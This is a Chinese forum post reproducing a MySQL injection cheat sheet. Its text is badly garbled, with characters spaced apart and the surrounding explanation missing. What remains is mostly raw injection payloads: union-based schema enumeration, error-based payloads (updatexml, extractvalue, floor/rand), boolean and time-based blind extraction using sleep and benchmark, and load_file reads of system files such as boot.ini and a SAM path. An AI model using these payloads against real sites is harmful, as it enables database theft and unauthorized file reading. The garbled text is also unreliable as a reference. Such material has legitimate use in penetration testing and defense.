搜索

[1084] 2020-03-16_听说这是史上最全的Mysql注入笔记?

文档创建者:s7ckTeam
浏览次数:160
最后更新:2025-01-16
2020-03-16_听说这是史上最全的Mysql注入笔记? M y s q l C h a B u g   C h a B u g   2 0 2 0 - 0 3 - 1 6 M Y S Q L v e r s i o n ( ) M y S Q L   u s e r ( ) d a t a b a s e ( ) @ @ d a t a d i r @ @ v e r s i o n _ c o m p i l e _ o s i n f o r m a t i o n _ s c h e m a   i n f o r m a t i o n _ s c h e m a . s c h e m a t a   i n f o r m a t i o n _ s c h e m a . t a b l e s   i n f o r m a t i o n _ s c h e m a . c o l u m n s   f l o o r R A N D ( ) 0 1 j o i n ( ) u n i o n   s e l e c t   1 , ( s e l e c t   g r o u p _ c o n c a t ( s c h e m a _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . s c h e m a t a ) , ( s e l e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e r a n d ( ) f l o o r ( )
r a n d   e x p m y s q l a n d   ( s e l e c t   1   f r o m   ( s e l e c t   c o u n t ( * ) , c o n c a t ( ( p a y l o a d ) , f l o o r   ( r a n d ( 0 ) * 2 ) ) x   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   x ) a ) a n d   ( s e l e c t   c o u n t ( * )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( u s e r ( ) , f l o o r ( r a n d ( 0 ) * 2 ) ) )   - -   + 1 '   a n d   u p d a t e x m l ( 1 , u s e r ( ) , 1 )   - - + p a y l o a d x m l , 3 2 e x t r a c t v a l u e ( 1 , c o n c a t ( ' ~ ' , u s e r ( ) , ' ~ ' ) ) 3 2 s e l e c t   c o u n t ( * )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( v e r s i o n ( ) ,   f l o o r ( r a n d ( 0 ) * 2 ) ) s e l e c t   c o u n t ( * )   f r o m   ( s e l e c t   1   u n i o n   s e l e c t   n u l l   u n i o n s e l e c t   ! 1 ) a   g r o u p   b y   c o n c a t ( v e r s i o n ( ) , f l o o r ( r a n d ( 0 ) * 2 ) ) s e l e c t   m i n ( @ a : = 1 )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( p a s s w o r d , @ a : = ( @ a + 1 ) % 2 ) s e l e c t   e x p ( ~ ( s e l e c t   *   F R O M ( S E L E C T   U S E R ( ) ) a ) ) s e l e c t   *   f r o m   ( s e l e c t   N A M E _ C O N S T ( v e r s i o n ( ) , 1 ) , N A M E _ C O N S T ( v e r s i o n ( ) , 1 ) ) x ;
r e g e x p   l i k e   M y s q l   F a l s e l e f t ( d a t a b a s e ( ) , 1 ) > ' s ' a s c i i ( s u b s t r ( ( s e l e c t   t a b l e _ n a m e   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e s _ s c h e m a   = d a t a b a s e ( ) l i m i t   0 , 1 ) , 1 , 1 ) ) = 1 0 1   - - + s u b s t r ( a , b , c )   b a c a s c i i ( )   a s c i i a s c i i ( s u b s t r ( s e l e c t   d a t a b a s e ( ) ) , 1 , 1 ) = 9 8 O R D ( M I D ( ( S E L E C T   I F N U L L ( C A S T ( u s e r n a m e   A S   C H A R ) , 0 x 2 0 ) F R O M   s e c u r i t y . u s e r s   O R D E R   B Y   i d   L I M I T   0 , 1 ) , 1 , 1 ) ) > 9 8 % 2 3 m i d ( a , b , c )   b a c o r d ( ) a s c i i ( ) a s c i i s e l e c t   u s e r ( )   r e g e x p   ' ^ [ a - z ] ' ; s e l e c t   u s e r ( )   r e g e x p   ' ^ r o ' s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   a n d   1 = ( i f ( ( u s e r ( )   r e g e x p   ' ^ r ' ) , 1 , 0 ) ) ; s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   a n d   1 = ( s e l e c t   1   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' s e c u r i t y '   a n d   t a b l e _ n a m e   r e g e x p   ' ^ u s [ a - z ] '   l i m i t   0 , 1 ) ; s e l e c t   u s e r ( )   l i k e   ' r o o t % ' I f ( a s c i i ( s u b s t r ( d a t a b a s e ( ) , 1 , 1 ) ) > 1 1 5 , 0 , s l e e p ( 5 ) ) % 2 3 U N I O N   S E L E C T   I F ( S U B S T R I N G ( c u r r e n t , 1 , 1 ) = C H A R ( 1 1 9 ) , B E N C H M A R K ( 5 0 0 0 0 0 0 , E N C O D E ( M   S G , b y   5   s e c o n d s ) ) , n u l l )   F R O M   ( s e l e c t   d a t a b a s e ( )   a s   c u r r e n t )   a s   t b 1 ; l o a d _ f i l e ( ) S e l e c t   1 , 2 , 3 , 4 , 5 , 6 , 7 , h e x ( r e p l a c e ( l o a d _ f i l e ( c h a r ( 9 9 , 5 8 , 9 2 , 1 1 9 , 1 0 5 , 1 1 0 , 1 0 0 , 1 1 1 , 1 1 9 , 1 1 5 , 9 2 ,   1 1 4 , 1 0 1 , 1 1 2 , 9 7 , 1 0 5 , 1 1 4 , 9 2 , 1 1 5 , 9 7 , 1 0 9 ) ) ) - 1   u n i o n   s e l e c t   1 , 1 , 1 , l o a d _ f i l e ( c h a r ( 9 9 , 5 8 , 4 7 , 9 8 , 1 1 1 , 1 1 1 , 1 1 6 , 4 6 , 1 0 5 , 1 1 0 , 1 0 5 ) )   E x p l a i n : c h a r ( 9 9 , 5 8 , 4 7 , 9 8 , 1 1 1 , 1 1 1 , 1 1 6 , 4 6 , 1 0 5 , 1 1 0 , 1 0 5 ) c : / b o o t . i n i   A S C I I   - 1   u n i o n   s e l e c t   1 , 1 , 1 , l o a d _ f i l e ( 0 x 6 3 3 a 2 f 6 2 6 f 6 f 7 4 2 e 6 9 6 e 6 9 )   E x p l a i n : c : / b o o t . i n i   1 6   0 x 6 3 3 a 2 f 6 2 6 f 6 f 7 4 2 e 6 9 6 e 6 9 - 1   u n i o n   s e l e c t   1 , 1 , 1 , l o a d _ f i l e ( c : b o o t . i n i )   E x p l a i n : /  
+   N U L L N U L L N U L L < = > N U L L   1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   T I M E S T A M P     D A T E T I M E - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   d e c i m a l     d e c i m a l     d e c i m a l     d e c i m a l   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - u s e r n a m e =   ' a d m i n ' + ( p a y l o a d )
-   *   /   u s e r n a m e   = ' a d m i n ' - - ( p a y l o a d ) u s e r n a m e   = ' 1 a b c ' *   ( p a y l o a d ) u s e r n a m e   = ' 1 a b c ' /   ( p a y l o a d ) 1 - ( a s c i i ( m i d ( ( p a s s w d ) f r o m ( n ) ) ) = m ) - s t r p o s l e n M I D ( s t r , p o s , l e n ) f r o m ( 1 ) f o r ( 1 ) m i d ( ( s t r ) f r o m ( i ) ) m i d ( ( s t r ) f r o m ( i ) f o r ( 1 ) )
&   |   ^   ' < < 0 ' > > 0 #   < >   =   u s e r n a m e = ' 1 a b c ' & ( p a y l o a d ) u s e r n a m e = ' a d m i n ' < > ( p a y l o a d ) u s e r n a m e = ' a d m i n ' = ( p a y l o a d ) ' + 1   i s   n o t   n u l l # ' i n ( - 1 , 1 ) # ' n o t   i n ( 1 , 0 ) # ' l i k e   1 # ' R E G E X P   1 # ' B E T W E E N   1   A N D   1 # ' d i v   1 # ' x o r   1 # ' = r o u n d ( 0 , 1 ) = ' 1 ' < > i f n u l l ( 1 , 2 ) = ' 1
M y s q l   s e l e c t   *   f r o m   u s e r s s e l e c t   1 , 2 , 3   u n i o n   s e l e c t   *   f r o m   u s e r s ; s e l e c t   ` 2 `   f r o m   ( s e l e c t   1 , 2 , 3   u n i o n   s e l e c t   *   f r o m   u s e r s ) r e d f o r c e ;
M y s q l   o r d e r   b y   u n i o n   s e l e c t   *   f r o m   u s e r s   w h e r e   i d = - 1   u n i o n   s e l e c t   1 , ( s e l e c t   c o n c a t ( ` 2 ` , 0 x 3 a , ` 3 ` )   f r o m   ( s e l e c t   1 , 2 , 3   u n i o n   s e l e c t   *   f r o m   u s e r s ) a   l i m i t   1 , 1 ) , 3 ; s e l e c t   *   f r o m   ( s e l e c t   1 ) a , ( s e l e c t   2 ) b , ( s e l e c t   3   ) c   u n i o n   s e l e c t   *   f r o m   u s e r s   s e l e c t   *   f r o m   u s e r s
s e l e c t   *   f r o m   u s e r s   u n i o n   s e l e c t   1 , 2 , 3   o r d e r   b y   3 s e l e c t   *   f r o m   u s e r s   u n i o n   s e l e c t   1 , 2 , ' a d m i n '   o r d e r   b y   3
i f s e l e c t   *   f r o m   u s e r s   u n i o n   s e l e c t   1 , 2 , ' a d m i n a a '   o r d e r   b y   3 o r d e r   b y   i f ( 1 = 1 , i d , u s e r n a m e ) o r d e r   b y   i f ( , 1 , ( s e l e c t   i d   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s ) )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理